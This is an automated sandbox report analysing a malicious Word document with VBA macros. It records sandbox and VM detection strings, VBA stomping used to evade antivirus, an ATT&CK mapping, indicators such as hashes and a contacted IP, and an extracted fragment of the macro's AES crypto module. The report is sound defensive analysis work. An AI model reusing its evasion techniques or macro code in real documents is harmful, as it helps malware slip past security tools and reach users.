Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\drivers\rasl2tp.sysRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}\0004 name: DriverDescJump to behavior
Source: 1KaTo6P18Z.docStream path 'Macros/VBA/Module3' : , ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVa
Source: SystemSettingsBroker.exe, 0000000E.00000002.6776193994.0000016745C00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2VMware Virtual USB Mouse
Source: SystemSettingsBroker.exe, 0000000E.00000003.3123210435.0000016747D87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: or.VMware Virtual disk SCSI Disk Device
Source: SystemSettingsBroker.exe, 0000000E.00000002.6777948900.0000016747D31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
Source: SystemSettingsBroker.exe, 0000000E.00000003.3123210435.0000016747D87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: SystemSettingsBroker.exe, 0000000E.00000003.3122387899.0000016747D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: SystemSettingsBroker.exe, 0000000E.00000003.3122387899.0000016747D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
Source: SystemSettingsBroker.exe, 0000000E.00000003.3122387899.0000016747D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ..SWD\COMPUTER\MFG_VMware__Inc.&PROD_VMware20_1
Source: SystemSettingsBroker.exe, 0000000E.00000002.6777948900.0000016747D31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wgencounter.infgencounter.devicedescMicrosoft Hyper-V Generation Counterwgencounter.inf
Source: SystemSettingsBroker.exe, 0000000E.00000003.3122387899.0000016747D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driverp
Source: SystemSettingsBroker.exe, 0000000E.00000002.6777823586.0000016747D06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
Source: SystemSettingsBroker.exe, 0000000E.00000003.3123210435.0000016747D87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
Source: SystemSettingsBroker.exe, 0000000E.00000003.3122387899.0000016747D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
Source: SystemSettingsBroker.exe, 0000000E.00000003.3122387899.0000016747D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v@oem1.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Devicep
Source: SystemSettingsBroker.exe, 0000000E.00000002.6777885026.0000016747D16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
Source: SystemSettingsBroker.exe, 0000000E.00000003.3122387899.0000016747D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0VMware, Inc. VMware20,1
Source: SystemSettingsBroker.exe, 0000000E.00000003.3123210435.0000016747D87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: SystemSettingsBroker.exe, 0000000E.00000002.6777823586.0000016747D06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter<
Source: SystemSettingsBroker.exe, 0000000E.00000002.6776983510.0000016745CF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc. VMware20,1h
Source: SystemSettingsBroker.exe, 0000000E.00000003.3122387899.0000016747D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: SystemSettingsBroker.exe, 0000000E.00000003.3122387899.0000016747D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
Source: SystemSettingsBroker.exe, 0000000E.00000002.6776983510.0000016745CF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SWD\COMPUTER\MFG_VMware__Inc.&PROD_VMware20_1
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Source: 1KaTo6P18Z.docOLE indicator, VBA stomping: true

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information42
Scripting		Valid Accounts1
Exploitation for Client Execution		1
LSASS Driver		1
LSASS Driver		1
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job42
Scripting		1
Process Injection		1
Virtualization/Sandbox Evasion		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Obfuscated Files or Information		1
DLL Side-Loading		1
Process Injection		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
DLL Side-Loading		Login Hook1
Deobfuscate/Decode Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets2
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
1KaTo6P18Z.doc54%VirustotalBrowse
1KaTo6P18Z.doc42%ReversingLabsWin32.Trojan.Leonem
1KaTo6P18Z.doc100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
84.201.210.39
truefalse
    		high

    World Map of Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox version:42.0.0 Malachite
    Analysis ID:1590808
    Start date and time:2025-01-14 15:29:44 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 11m 43s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
    Run name:Potential for more IOCs and behavior
    Number of analysed new started processes analysed:24
    Number of new started drivers analysed:8
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • GSI enabled (VBA)
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:1KaTo6P18Z.doc
    renamed because original name is a hash value
    Original Sample Name:1ae98e28ff5e890d00429031f5369692389256290dd4e5867f822db51cdc8027(1).doc
    Detection:MAL
    Classification:mal72.expl.evad.winDOC@4/2@0/0
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .doc

    Warnings

    • Max analysis timeout: 600s exceeded, the analysis took too long
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SecurityHealthHost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.109.28.48, 52.113.194.132, 52.109.28.47, 23.193.201.200, 23.219.161.100, 104.208.16.95, 23.38.98.96, 23.38.98.104, 2.21.65.149, 2.21.65.130, 52.109.32.46, 52.109.32.47, 52.109.32.39, 52.109.32.38, 2.23.240.50, 52.182.143.213, 20.190.159.71, 20.109.210.53, 2.18.64.203
    • Excluded domains from analysis (whitelisted): osiprod-uks-bronze-azsc-000.uksouth.cloudapp.azure.com, e1324.dscd.akamaiedge.net, odc.officeapps.live.com, slscr.update.microsoft.com, img-s-msn-com.akamaized.net, weu-azsc-config.officeapps.live.com, a767.dspw65.akamai.net, mobile.events.data.microsoft.com, onedscolprdcus16.centralus.cloudapp.azure.com, login.live.com, officeclient.microsoft.com, templatesmetadata.office.net, wu-b-net.trafficmanager.net, ecs.office.com, e40491.dscg.akamaiedge.net, uci.cdn.office.net, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, uks-azsc-000.odc.officeapps.live.com, uks-azsc-000.roaming.officeapps.live.com, nleditor.osi.office.net, res-prod.trafficmanager.net, owamail.public.cdn.office.net.edgekey.net, s-0005.s-msedge.net, owamail.public.cdn.office.net.edgekey.net.globalredir.akadns.net, metadata.templates.cdn.office.net, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, mobile.events.data.trafficmanager.net, europe.odcsm1.live.com.akadns
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Report size getting too big, too many NtReadVirtualMemory calls found.
    • Report size getting too big, too many NtSetValueKey calls found.

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comoriginal.emlGet hashmaliciousUnknownBrowse
    • 217.20.57.34
    RFQ____PC25-1301.xlsxGet hashmaliciousUnknownBrowse
    • 84.201.210.23
    577119676170175151.jsGet hashmaliciousStrela DownloaderBrowse
    • 84.201.210.39
    3062912729105825642.jsGet hashmaliciousStrela DownloaderBrowse
    • 217.20.57.18
    Rev5_ Joint Declaration C5 GER_track changes.docGet hashmaliciousUnknownBrowse
    • 217.20.57.20
    40#U0433.docGet hashmaliciousUnknownBrowse
    • 84.201.210.39
    Rev5_ Joint Declaration C5 GER_track changes.docGet hashmaliciousUnknownBrowse
    • 217.20.57.18
    3.19.1+SetupWIService.exeGet hashmaliciousUnknownBrowse
    • 217.20.57.35
    JUbmpeT.exeGet hashmaliciousVidarBrowse
    • 217.20.57.18
    DOCS974i7C63.pdfGet hashmaliciousHTMLPhisherBrowse
    • 217.20.57.20

    ASNs

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Temp\~DFBD18F568DFED32BE.TMP

    Download File
    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):512
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:BF619EAC0CDF3F68D496EA9344137E8B
    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
    Malicious:false
    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\Desktop\~$aTo6P18Z.doc

    Download File
    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.268703117484635
    Encrypted:false
    SSDEEP:3:M//PlyFXlmntjlM/tPlelvtllq4ytlfhx/:s/PK1wZM/u64ytF
    MD5:663C17C1C459064150F857DAF68A26C4
    SHA1:56D82FB4FF788D16079EBD009A40A155B0DDF503
    SHA-256:235786D2C37AE540EA7EE8A95D4A9EF56E82799532A053AF43C3EC53FA28F4AE
    SHA-512:D1D3C48F492CC23DF82AAF32D8FA56CE480784ADDE277A10DD4C49674E3B874DBB9410F93850F0CAB69140C4E149D807CD45025D84B2838D9BB14C02CCDE9207
    Malicious:false
    Preview:.user..................................................M.e.r.c.y........#....@</.............8n......................................\@k.&...................6.z.

    Static File Info

    General

    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: ADMIN, Template: Normal.dotm, Last Saved By: ADMIN, Revision Number: 31, Name of Creating Application: Microsoft Office Word, Total Editing Time: 27:00, Create Time/Date: Sun Dec 15 15:28:00 2024, Last Saved Time/Date: Sun Dec 15 16:33:00 2024, Number of Pages: 1, Number of Words: 3, Number of Characters: 18, Security: 0
    Entropy (8bit):4.938913929090626
    TrID:
    • Microsoft Word document (32009/1) 54.23%
    • Microsoft Word document (old ver.) (19008/1) 32.20%
    • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
    File name:1KaTo6P18Z.doc
    File size:98'816 bytes
    MD5:f8b594e0b1d7a56093034e74d9374f6a
    SHA1:f42044adff61da67c1f7436625a4d7a86c1f6e33
    SHA256:1ae98e28ff5e890d00429031f5369692389256290dd4e5867f822db51cdc8027
    SHA512:715a58a9e028f6bf401406462e46964248674e0e62688f14ec57b13141b818c3161337a65723d8991f9fcc6c8c7324bcae253c94d1db0bb4728d1d73140ae11f
    SSDEEP:3072:3CJx1U8LnkqP/StD2kRBHDnD4qokPUqD61q8Uv2hPJOy:SJ7oWq8Uv2h
    TLSH:5BA3F695F642C82ADBC814715C9BD3FEB6787D06AD48D71732A0731E3CB67A4C605784
    File Content Preview:........................>.......................'...........)...............&...u..............................................................................................................................................................................

    File Icon

    Icon Hash:35e1cc889a8a8599

    Static OLE Info

    General

    Document Type:OLE
    Number of OLE Files:1

    OLE File "1KaTo6P18Z.doc"

    Indicators
    Has Summary Info:
    Application Name:Microsoft Office Word
    Encrypted Document:False
    Contains Word Document Stream:True
    Contains Workbook/Book Stream:False
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:False
    Flash Objects Count:0
    Contains VBA Macros:True
    Summary
    Code Page:1252
    Title:
    Subject:
    Author:ADMIN
    Keywords:
    Comments:
    Template:Normal.dotm
    Last Saved By:ADMIN
    Revion Number:31
    Total Edit Time:1620
    Create Time:2024-12-15 15:28:00
    Last Saved Time:2024-12-15 16:33:00
    Number of Pages:1
    Number of Words:3
    Number of Characters:18
    Creating Application:Microsoft Office Word
    Security:0
    Document Summary
    Document Code Page:1252
    Number of Lines:1
    Number of Paragraphs:1
    Thumbnail Scaling Desired:False
    Company:
    Contains Dirty Links:False
    Shared Document:False
    Changed Hyperlinks:False
    Application Version:1048576

    Streams with VBA

    VBA File Name: Module1.bas, Stream Size: 689
    General
    Stream Path:Macros/VBA/Module1
    VBA File Name:Module1.bas
    Stream Size:689
    Data ASCII:. . . . . . . . * . . . . . . . . . 1 . . . . . . . . . . . . . . A - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 01 f0 00 00 00 2a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 31 02 00 00 85 02 00 00 00 00 00 00 01 00 00 00 96 41 2d ce 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "Module1"

    VBA File Name: Module11.bas, Stream Size: 1059
    General
    Stream Path:Macros/VBA/Module11
    VBA File Name:Module11.bas
    Stream Size:1059
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . h . . . ` . . . . . . . . . P . . . . . . . . . 8 . . . . . . . . .
    Data Raw:01 16 03 00 01 f0 00 00 00 92 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 99 03 00 00 f5 03 00 00 00 00 00 00 01 00 00 00 96 41 a5 a5 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "Module11"

    VBA File Name: Module3.bas, Stream Size: 45138
    General
    Stream Path:Macros/VBA/Module3
    VBA File Name:Module3.bas
    Stream Size:45138
    Data ASCII:. . . . . h . . . r 7 . . L . . . ( . . . 7 . . . . . . . . . . . . . A 0 . . . . . . . . . . . . . D . . . . . H . . c . R . e . g . . . . . . . . . . . . . . . . . R t l M o v e M e m o r y . . . . . N . P . . . . . . . . . . . . . . . . . . . . . . . . . . . V a r P t r . . . . T . x . . . 0 . . . . . . . . . . . . . . . . . . . . . . . h t o n l . . . . . \\ . . . . X . . . . . . . . . . . . . . . . . . . . . . . S y s t e m F u n c t i o n 0 3 6 . . . . . h . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 01 68 05 00 00 72 37 00 00 4c 05 00 00 28 06 00 00 ff ff ff ff a4 37 00 00 dc 88 00 00 00 00 00 00 01 00 00 00 96 41 f5 30 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 44 04 00 00 00 00 48 02 20 00 63 00 ff ff 52 00 65 00 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 74 6c 4d 6f 76 65 4d 65 6d 6f 72 79 00 00 00 00 00 4e 02 50 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "Module3"
'--- mdAesCtr.bas
Option Explicit
DefObj A-Z

#Const HasPtrSafe = (VBA7 <> 0) Or (TWINBASIC <> 0)

'=========================================================================
' API
'=========================================================================

#If Win64 Then
    Private Const PTR_SIZE                  As Long = 8
#Else
    Private Const PTR_SIZE                  As Long = 4
#End If

#If HasPtrSafe Then
Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Private Declare PtrSafe Function ArrPtr Lib "vbe7" Alias "VarPtr" (Ptr() As Any) As LongPtr
Private Declare PtrSafe Function htonl Lib "ws2_32" (ByVal hostlong As Long) As Long
Private Declare PtrSafe Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036" (RandomBuffer As Any, ByVal RandomBufferLength As Long) As Long
'--- bcrypt
Private Declare PtrSafe Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm As LongPtr, ByVal pszAlgId As LongPtr, ByVal pszImplementation As LongPtr, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm As LongPtr, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptGetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, pbOutput As Any, ByVal cbOutput As Long, cbResult As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptSetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, ByVal pbInput As LongPtr, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phKey As LongPtr, pbKeyObject As Any, ByVal cbKeyObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey As LongPtr) As Long
Private Declare PtrSafe Function BCryptEncrypt Lib "bcrypt" (ByVal hKey As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal pPaddingInfo As LongPtr, ByVal pbIV As LongPtr, ByVal cbIV As Long, pbOutput As Any, ByVal cbOutput As Long, pcbResult As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf As LongPtr, pbPassword As Any, ByVal cbPassword As Long, pbSalt As Any, ByVal cbSalt As Long, ByVal cIterations As Currency, pbDerivedKey As Any, ByVal cbDerivedKey As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phHash As LongPtr, ByVal pbHashObject As LongPtr, ByVal cbHashObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash As LongPtr) As Long
Private Declare PtrSafe Function BCryptHashData Lib "bcrypt" (ByVal hHash As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptFinishHash Lib "bcrypt" (ByVal hHash As LongPtr, pbOutput As Any, ByVal cbOutput As Long, ByVal dwFlags As Long) As Long
#Else
Private Enum LongPtr
    [_]
End Enum
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Private Declare Function ArrPtr Lib "msvbvm60" Alias "VarPtr" (Ptr() As Any) As LongPtr
Private Declare Function htonl Lib "ws2_32" (ByVal hostlong As Long) As Long
Private Declare Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036" (RandomBuffer As Any, ByVal RandomBufferLength As Long) As Long
'--- bcrypt
Private Declare Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm As LongPtr, ByVal pszAlgId As LongPtr, ByVal pszImplementation As LongPtr, ByVal dwFlags As Long) As Long
Private Declare Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm As LongPtr, ByVal dwFlags As Long) As Long
Private Declare Function BCryptGetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, pbOutput As Any, ByVal cbOutput As Long, cbResult As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptSetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, ByVal pbInput As LongPtr, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phKey As LongPtr, pbKeyObject As Any, ByVal cbKeyObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey As LongPtr) As Long
Private Declare Function BCryptEncrypt Lib "bcrypt" (ByVal hKey As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal pPaddingInfo As LongPtr, ByVal pbIV As LongPtr, ByVal cbIV As Long, pbOutput As Any, ByVal cbOutput As Long, pcbResult As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf As LongPtr, pbPassword As Any, ByVal cbPassword As Long, pbSalt As Any, ByVal cbSalt As Long, ByVal cIterations As Currency, pbDerivedKey As Any, ByVal cbDerivedKey As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phHash As LongPtr, ByVal pbHashObject As LongPtr, ByVal cbHashObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash As LongPtr) As Long
Private Declare Function BCryptHashData Lib "bcrypt" (ByVal hHash As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptFinishHash Lib "bcrypt" (ByVal hHash As LongPtr, pbOutput As Any, ByVal cbOutput As Long, ByVal dwFlags As Long) As Long
#End If
#If Not ImplUseShared Then
    #If HasPtrSafe Then
    Private Declare PtrSafe Function CryptStringToBinary Lib "crypt32" Alias "CryptStringToBinaryW" (ByVal pszString As LongPtr, ByVal cchString As Long, ByVal dwFlags As Long, ByVal pbBinary As LongPtr, pcbBinary As Long, pdwSkip As Long, pdwFlags As Long) As Long
    Private Declare PtrSafe Function CryptBinaryToString Lib "crypt32" Alias "CryptBinaryToStringW" (ByVal pbBinary As LongPtr, ByVal cbBinary As Long, ByVal dwFlags As Long, ByVal pszString As LongPtr, pcchString As Long) As Long
    Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
    Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
